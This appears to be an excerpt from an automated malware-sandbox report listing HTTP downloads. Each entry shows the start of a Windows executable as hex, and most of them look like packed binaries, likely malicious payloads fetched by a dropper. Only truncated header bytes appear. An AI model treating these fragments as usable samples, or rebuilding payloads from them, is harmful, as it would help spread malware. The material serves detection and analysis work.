Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 24 Oct 2024 02:01:42 GMTContent-Type: application/octet-streamContent-Length: 1895936Last-Modified: Thu, 24 Oct 2024 01:49:23 GMTConnection: keep-aliveETag: "6719a7a3-1cee00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a7 bb 2d 49 e3 da 43 1a e3 da 43 1a e3 da 43 1a b8 b2 40 1b ed da 43 1a b8 b2 46 1b 42 da 43 1a 36 b7 47 1b f1 da 43 1a 36 b7 40 1b f5 da 43 1a 36 b7 46 1b 96 da 43 1a b8 b2 47 1b f7 da 43 1a b8 b2 42 1b f0 da 43 1a e3 da 42 1a 35 da 43 1a 78 b4 4a 1b e2 da 43 1a 78 b4 bc 1a e2 da 43 1a 78 b4 41 1b e2 da 43 1a 52 69 63 68 e3 da 43 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 9c 56 f0 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 ea 04 00 00 ca 01 00 00 00 00 00 00 f0 4a 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 20 4b 00 00 04 00 00 86 d7 1d 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 a0 06 00 6b 00 00 00 00 90 06 00 e0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 14 d2 4a 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c4 d1 4a 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 06 00 00 10 00 00 00 de 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 e0 01 00 00 00 90 06 00 00 02 00 00 00 ee 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 06 00 00 02 00 00 00 f0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 50 2a 00 00 b0 06 00 00 02 00 00 00 f2 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 69 72 6f 70 67 66 73 73 00 e0 19 00 00 00 31 00 00 d4 19 00 00 f4 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 67 6d 75 74 77 74 7a 68 00 10 00 00 00 e0 4a 00 00 04 00 00 00 c8 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 f0 4a 00 00 22 00 00 00 cc 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 24 Oct 2024 02:01:45 GMTContent-Type: application/octet-streamContent-Length: 1918464Last-Modified: Thu, 24 Oct 2024 01:49:16 GMTConnection: keep-aliveETag: "6719a79c-1d4600"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 bd cf 9d 43 f9 ae f3 10 f9 ae f3 10 f9 ae f3 10 96 d8 58 10 e1 ae f3 10 96 d8 6d 10 f4 ae f3 10 96 d8 59 10 c0 ae f3 10 f0 d6 70 10 fa ae f3 10 79 d7 f2 11 fb ae f3 10 f0 d6 60 10 fe ae f3 10 f9 ae f2 10 97 ae f3 10 96 d8 5c 10 eb ae f3 10 96 d8 6e 10 f8 ae f3 10 52 69 63 68 f9 ae f3 10 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 4a 9a f9 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 ce 01 00 00 1a 24 00 00 00 00 00 00 90 6c 00 00 10 00 00 00 e0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 c0 6c 00 00 04 00 00 72 5c 1d 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 50 d0 25 00 64 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 d1 25 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 b0 25 00 00 10 00 00 00 28 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 20 20 20 00 10 00 00 00 c0 25 00 00 00 00 00 00 38 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 d0 25 00 00 02 00 00 00 38 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 b0 2b 00 00 e0 25 00 00 02 00 00 00 3a 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 66 7a 78 6b 76 69 6d 72 00 f0 1a 00 00 90 51 00 00 e4 1a 00 00 3c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 75 62 75 6f 6b 79 74 75 00 10 00 00 00 80 6c 00 00 04 00 00 00 20 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 90 6c 00 00 22 00 00 00 24 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 24 Oct 2024 02:01:47 GMTContent-Type: application/octet-streamContent-Length: 2742272Last-Modified: Thu, 24 Oct 2024 01:44:44 GMTConnection: keep-aliveETag: "6719a68c-29d800"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 40 2a 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 80 2a 00 00 04 00 00 25 5a 2a 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 9c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 00 00 00 20 00 00 00 12 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 9c 05 00 00 00 60 00 00 00 06 00 00 00 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 80 00 00 00 02 00 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 76 78 69 6a 65 73 76 6f 00 80 29 00 00 a0 00 00 00 78 29 00 00 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 65 6f 61 6d 79 79 68 71 00 20 00 00 00 20 2a 00 00 04 00 00 00 b2 29 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 40 2a 00 00 22 00 00 00 b6 29 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 24 Oct 2024 02:01:59 GMTContent-Type: application/octet-streamContent-Length: 3015168Last-Modified: Thu, 24 Oct 2024 01:49:10 GMTConnection: keep-aliveETag: "6719a796-2e0200"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 4a f1 ff 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 a0 04 00 00 dc 00 00 00 00 00 00 00 80 31 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 b0 31 00 00 04 00 00 99 a1 2e 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 f0 05 00 6b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 f1 05 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 d0 05 00 00 10 00 00 00 5e 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 20 20 20 00 10 00 00 00 e0 05 00 00 00 00 00 00 6e 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 f0 05 00 00 02 00 00 00 6e 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 76 7a 6b 6a 6a 72 79 63 00 70 2b 00 00 00 06 00 00 6a 2b 00 00 70 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 67 6c 71 70 7a 75 65 75 00 10 00 00 00 70 31 00 00 06 00 00 00 da 2d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 80 31 00 00 22 00 00 00 e0 2d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 24 Oct 2024 02:02:10 GMTContent-Type: application/octet-streamContent-Length: 1918464Last-Modified: Thu, 24 Oct 2024 01:49:16 GMTConnection: keep-aliveETag: "6719a79c-1d4600"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 bd cf 9d 43 f9 ae f3 10 f9 ae f3 10 f9 ae f3 10 96 d8 58 10 e1 ae f3 10 96 d8 6d 10 f4 ae f3 10 96 d8 59 10 c0 ae f3 10 f0 d6 70 10 fa ae f3 10 79 d7 f2 11 fb ae f3 10 f0 d6 60 10 fe ae f3 10 f9 ae f2 10 97 ae f3 10 96 d8 5c 10 eb ae f3 10 96 d8 6e 10 f8 ae f3 10 52 69 63 68 f9 ae f3 10 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 4a 9a f9 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 ce 01 00 00 1a 24 00 00 00 00 00 00 90 6c 00 00 10 00 00 00 e0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 c0 6c 00 00 04 00 00 72 5c 1d 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 50 d0 25 00 64 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 d1 25 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 b0 25 00 00 10 00 00 00 28 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 20 20 20 00 10 00 00 00 c0 25 00 00 00 00 00 00 38 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 d0 25 00 00 02 00 00 00 38 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 b0 2b 00 00 e0 25 00 00 02 00 00 00 3a 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 66 7a 78 6b 76 69 6d 72 00 f0 1a 00 00 90 51 00 00 e4 1a 00 00 3c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 75 62 75 6f 6b 79 74 75 00 10 00 00 00 80 6c 00 00 04 00 00 00 20 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 90 6c 00 00 22 00 00 00 24 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 24 Oct 2024 02:02:19 GMTContent-Type: application/octet-streamContent-Length: 919552Last-Modified: Thu, 24 Oct 2024 01:44:18 GMTConnection: keep-aliveETag: "6719a672-e0800"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 9a c7 83 ae de a6 ed fd de a6 ed fd de a6 ed fd 6a 3a 1c fd fd a6 ed fd 6a 3a 1e fd 43 a6 ed fd 6a 3a 1f fd fd a6 ed fd 40 06 2a fd df a6 ed fd 8c ce e8 fc f3 a6 ed fd 8c ce e9 fc cc a6 ed fd 8c ce ee fc cb a6 ed fd d7 de 6e fd d7 a6 ed fd d7 de 7e fd fb a6 ed fd de a6 ec fd f7 a4 ed fd 7b cf e3 fc 8e a6 ed fd 7b cf ee fc df a6 ed fd 7b cf 12 fd df a6 ed fd de a6 7a fd df a6 ed fd 7b cf ef fc df a6 ed fd 52 69 63 68 de a6 ed fd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 6a a6 19 67 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0e 10 00 ac 09 00 00 58 04 00 00 00 00 00 77 05 02 00 00 10 00 00 00 c0 09 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 60 0e 00 00 04 00 00 88 3d 0e 00 02 00 40 80 00 00 40 00 00 10 00 00 00 00 40 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 64 8e 0c 00 7c 01 00 00 00 40 0d 00 28 9c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 0d 00 94 75 00 00 f0 0f 0b 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 34 0c 00 18 00 00 00 10 10 0b 00 40 00 00 00 00 00 00 00 00 00 00 00 00 c0 09 00 94 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 1d ab 09 00 00 10 00 00 00 ac 09 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 82 fb 02 00 00 c0 09 00 00 fc 02 00 00 b0 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 6c 70 00 00 00 c0 0c 00 00 48 00 00 00 ac 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 28 9c 00 00 00 40 0d 00 00 9e 00 00 00 f4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 94 75 00 00 00 e0 0d 00 00 76 00 00 00 92 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 24 Oct 2024 02:02:24 GMTContent-Type: application/octet-streamContent-Length: 314368Last-Modified: Sun, 29 Sep 2024 08:19:54 GMTConnection: keep-aliveETag: "66f90daa-4cc00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 bd cf 9d 43 f9 ae f3 10 f9 ae f3 10 f9 ae f3 10 96 d8 58 10 e1 ae f3 10 96 d8 6d 10 f4 ae f3 10 96 d8 59 10 c0 ae f3 10 f0 d6 70 10 fa ae f3 10 79 d7 f2 11 fb ae f3 10 f0 d6 60 10 fe ae f3 10 f9 ae f2 10 97 ae f3 10 96 d8 5c 10 eb ae f3 10 96 d8 6e 10 f8 ae f3 10 52 69 63 68 f9 ae f3 10 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 4a 9a f9 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 ce 01 00 00 1a 24 00 00 00 00 00 f0 69 01 00 00 10 00 00 00 e0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 10 26 00 00 04 00 00 00 00 00 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 28 aa 02 00 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 25 00 e0 24 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 01 00 04 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 8f cc 01 00 00 10 00 00 00 ce 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 e0 2e 72 64 61 74 61 00 00 8c cf 00 00 00 e0 01 00 00 d0 00 00 00 d2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 a4 03 23 00 00 b0 02 00 00 e4 01 00 00 a2 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 65 6c 6f 63 00 00 9e 45 00 00 00 c0 25 00 00 46 00 00 00 86 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
